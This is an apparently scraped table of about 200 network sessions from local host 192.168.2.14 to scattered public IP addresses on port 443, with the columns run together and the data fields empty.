                                                        10121192.168.2.1449914188.174.52.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10122192.168.2.1449756133.63.198.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10123192.168.2.145900893.126.168.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10124192.168.2.1450170126.122.230.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10125192.168.2.1438976166.131.224.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10126192.168.2.1446282212.207.38.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10127192.168.2.143989219.37.65.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10128192.168.2.145695040.142.100.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10129192.168.2.144101234.12.37.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10130192.168.2.1450282167.8.171.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10131192.168.2.1441238157.196.35.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10132192.168.2.145403686.238.242.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10133192.168.2.1443174199.3.68.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10134192.168.2.1433846194.191.63.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10135192.168.2.145795467.66.59.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10136192.168.2.143723897.170.99.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10137192.168.2.1457402117.248.13.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10138192.168.2.1436936183.19.226.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10139192.168.2.1439830137.238.226.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10140192.168.2.1437058169.57.121.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10141192.168.2.1454318194.144.149.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10142192.168.2.1447214151.200.253.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10143192.168.2.1433380210.226.23.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10144192.168.2.145774094.245.98.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10145192.168.2.1441122207.142.168.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10146192.168.2.1453920169.23.132.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10147192.168.2.1449068102.182.100.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10148192.168.2.1441878148.51.201.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10149192.168.2.1440336178.110.180.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10150192.168.2.1440430174.44.241.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10151192.168.2.143850879.250.71.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10152192.168.2.144387443.245.3.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10153192.168.2.144719440.14.229.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10154192.168.2.1439788131.232.85.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10155192.168.2.1436834101.129.79.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10156192.168.2.144638838.65.97.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10157192.168.2.1440064144.22.212.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10158192.168.2.144654071.167.241.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10159192.168.2.14423908.60.80.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10160192.168.2.1454194113.145.29.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10161192.168.2.143382453.238.134.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10162192.168.2.145520058.151.48.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10163192.168.2.145007051.20.113.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10164192.168.2.1459444212.2.29.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10165192.168.2.143348453.140.197.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10166192.168.2.144060099.201.1.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10167192.168.2.143412082.166.106.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10168192.168.2.1448312162.66.142.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10169192.168.2.145759612.152.231.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10170192.168.2.145894464.0.231.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10171192.168.2.144885853.55.149.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10172192.168.2.144906698.252.98.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10173192.168.2.1454384194.76.78.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10174192.168.2.1455644138.82.133.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10175192.168.2.143993880.207.142.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10176192.168.2.1456656136.24.207.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10177192.168.2.1434928134.248.100.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10178192.168.2.1432918195.19.153.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10179192.168.2.144742262.100.181.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10180192.168.2.145807474.235.32.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10181192.168.2.1444770167.122.12.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10182192.168.2.1453092176.13.65.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10183192.168.2.1455606162.248.136.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10184192.168.2.143514825.77.241.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10185192.168.2.1444568143.90.6.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10186192.168.2.1433884193.209.198.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10187192.168.2.1433834111.78.95.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10188192.168.2.145818062.164.80.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10189192.168.2.145950063.149.198.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10190192.168.2.1438918138.240.204.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10191192.168.2.1447548205.135.211.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192192.168.2.1448384176.128.224.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10193192.168.2.144539213.149.90.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10194192.168.2.145061499.174.174.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10195192.168.2.145665465.137.12.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10196192.168.2.1456494106.128.69.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10197192.168.2.1460164114.5.179.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10198192.168.2.1450866161.18.141.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10199192.168.2.1442350151.12.8.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10200192.168.2.1444530216.125.140.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10201192.168.2.1438688100.138.7.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10202192.168.2.1450904134.154.10.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10203192.168.2.1453768168.186.122.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10204192.168.2.145919825.31.36.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10205192.168.2.14386524.172.50.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10206192.168.2.145923027.172.170.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10207192.168.2.14351881.207.46.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10208192.168.2.1439514193.168.182.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10209192.168.2.143849418.223.153.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10210192.168.2.1436402208.100.37.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10211192.168.2.144818687.211.172.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10212192.168.2.1456544128.233.76.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10213192.168.2.1458936133.178.105.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10214192.168.2.145977462.201.45.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10215192.168.2.143613892.43.100.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10216192.168.2.144434673.19.178.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10217192.168.2.145020468.28.66.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10218192.168.2.144664443.175.10.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10219192.168.2.145305285.178.25.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10220192.168.2.145647041.97.143.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10221192.168.2.1446098157.239.155.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10222192.168.2.1449820166.253.194.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10223192.168.2.143927664.94.59.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10224192.168.2.1445810109.134.119.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10225192.168.2.1433288161.0.121.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10226192.168.2.143414250.62.186.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10227192.168.2.1450580111.114.252.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10228192.168.2.1459822222.129.169.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10229192.168.2.1440220213.150.177.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10230192.168.2.143317874.146.159.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10231192.168.2.1450364101.23.158.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10232192.168.2.145785888.23.94.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10233192.168.2.1456724170.117.82.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10234192.168.2.1440938108.190.93.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10235192.168.2.1451412142.59.98.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10236192.168.2.144690895.250.248.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10237192.168.2.1442618148.144.119.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10238192.168.2.1445730183.246.193.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10239192.168.2.1455248179.158.249.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10240192.168.2.1435386131.237.6.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10241192.168.2.14491249.185.53.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10242192.168.2.1439774165.26.67.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10243192.168.2.146076243.225.47.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10244192.168.2.145937479.206.11.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10245192.168.2.145566478.201.69.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10246192.168.2.144078464.179.153.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10247192.168.2.1433838110.206.190.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10248192.168.2.1443436167.144.238.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10249192.168.2.1435804130.129.123.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10250192.168.2.1443502217.213.170.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10251192.168.2.1449006171.236.58.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10252192.168.2.145915475.127.58.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10253192.168.2.145069817.225.64.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10254192.168.2.1447248210.40.208.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10255192.168.2.145696837.54.170.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10256192.168.2.146081890.57.233.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10257192.168.2.1445802118.132.101.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10258192.168.2.143315881.28.221.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10259192.168.2.143378485.7.178.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10260192.168.2.1459084119.152.109.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10261192.168.2.1438964158.143.38.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10262192.168.2.1458118172.247.244.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10263192.168.2.1446118204.44.95.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10264192.168.2.143419883.230.66.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10265192.168.2.14557961.124.148.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10266192.168.2.144973836.4.231.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10267192.168.2.1433922139.209.224.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10268192.168.2.1445156129.89.43.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10269192.168.2.146073080.140.78.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10270192.168.2.1449930196.41.255.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10271192.168.2.145965097.192.161.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10272192.168.2.1449868131.227.221.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10273192.168.2.1454498209.20.74.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10274192.168.2.1440504181.207.128.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10275192.168.2.1446712133.173.189.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10276192.168.2.146034494.154.221.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10277192.168.2.14557769.208.45.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10278192.168.2.1432910181.0.18.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10279192.168.2.1442264197.191.149.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10280192.168.2.1440986115.21.107.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10281192.168.2.1435084183.27.73.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10282192.168.2.144757261.85.10.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10283192.168.2.1454790213.186.239.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10284192.168.2.145165665.10.249.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10285192.168.2.1443604195.8.127.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10286192.168.2.145107032.17.87.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10287192.168.2.1455688151.150.119.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10288192.168.2.1444634129.38.235.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10289192.168.2.144064441.252.68.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10290192.168.2.1446002122.224.200.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10291192.168.2.1453700125.108.240.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10292192.168.2.145972849.9.2.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10293192.168.2.1451586183.134.62.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10294192.168.2.143412283.46.204.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10295192.168.2.1454200101.24.126.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10296192.168.2.1455654203.185.18.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10297192.168.2.145583449.87.152.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10298192.168.2.1450502106.159.40.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10299192.168.2.146046072.254.97.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10300192.168.2.143718297.104.139.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10301192.168.2.145664488.133.140.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10302192.168.2.145879443.192.201.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10303192.168.2.1434232147.220.204.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10304192.168.2.145878650.32.155.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10305192.168.2.1432938221.117.122.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10306192.168.2.144649063.198.221.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10307192.168.2.144182638.62.167.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10308192.168.2.1456774165.205.32.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10309192.168.2.143309237.248.133.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10310192.168.2.1451814216.83.3.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10311192.168.2.1443530149.139.93.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10312192.168.2.1451496109.153.57.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10313192.168.2.144933276.203.60.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10314192.168.2.1457696181.166.196.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10315192.168.2.145460854.24.88.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10316192.168.2.1441984106.142.162.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10317192.168.2.1443236173.57.115.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10318192.168.2.145640870.226.105.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10319192.168.2.143863689.93.20.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10320192.168.2.1438348126.146.235.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10321192.168.2.144541450.200.170.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10322192.168.2.144462225.111.105.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10323192.168.2.1434356193.13.134.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10324192.168.2.144793640.79.10.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10325192.168.2.1454978161.116.96.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10326192.168.2.1436216131.232.179.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10327192.168.2.145786424.158.225.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10328192.168.2.1443404177.152.234.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10329192.168.2.1460014131.136.225.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10330192.168.2.1452200102.135.61.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10331192.168.2.1460600108.243.252.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10332192.168.2.14511525.17.122.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10333192.168.2.1453514162.30.232.139443
